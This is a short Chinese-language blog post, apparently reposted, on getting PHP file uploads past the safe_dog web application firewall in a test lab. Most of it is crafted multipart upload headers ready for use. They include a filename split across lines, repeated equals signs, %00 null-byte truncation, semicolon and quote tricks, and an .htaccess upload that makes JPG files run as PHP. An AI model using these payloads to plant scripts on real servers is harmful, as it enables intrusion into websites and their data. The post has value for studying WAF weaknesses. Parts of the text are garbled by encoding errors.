php文件上传漏洞waf,文件上传绕过WAF
文件上傳
文件上傳實(shí)質(zhì)上還是客戶端的POST請(qǐng)求,消息主體是一些上傳信息。前端上傳頁(yè)面需要指定
enctype為multipart/from-data才能正常上傳文件。
此處不講各種中間件解析漏洞只列舉集幾種safe_dog對(duì)腳本文件上傳攔截的繞過(guò)
靶機(jī)環(huán)境:win2003+safe_dog4.0.23957+webug中的上傳
1、換行
Content-Disposition: form-data; name="file"; filename="1.p
hp"
Content-Type: image/jpeg
-----------------------------127619278770
2、多個(gè)等號(hào)(不止2,3個(gè))
Content-Disposition: form-data; name="file"; filename=="2.php"
Content-Type: image/jpeg
-----------------------------127619278770
Content-Disposition: form-data; name="file"; filename==="3.php"
Content-Type: image/jpeg
-----------------------------127619278770
3、00截?cái)?/p>
Content-Disposition: form-data; name="file"; filename="4.php%00"
Content-Type: image/jpeg
-----------------------------127619278770
4、文件名+;號(hào)
Content-Disposition: form-data; name="file"; filename="6;.php"
Content-Type: image/jpeg
-----------------------------127619278770
5、文件名+‘
Content-Disposition: form-data; name="file"; filename="7'.php"
Content-Type: image/jpeg
-----------------------------127619278770
6、上傳.htaccess
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg
AddType application/x-httpd-php jpg
-----------------------------127619278770
總結(jié)
以上是生活随笔為你收集整理的php文件上传漏洞waf,文件上传绕过WAF的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 论语十二章人而不仁原文及翻译
- 下一篇: 超级好听的简单干净中性网名80个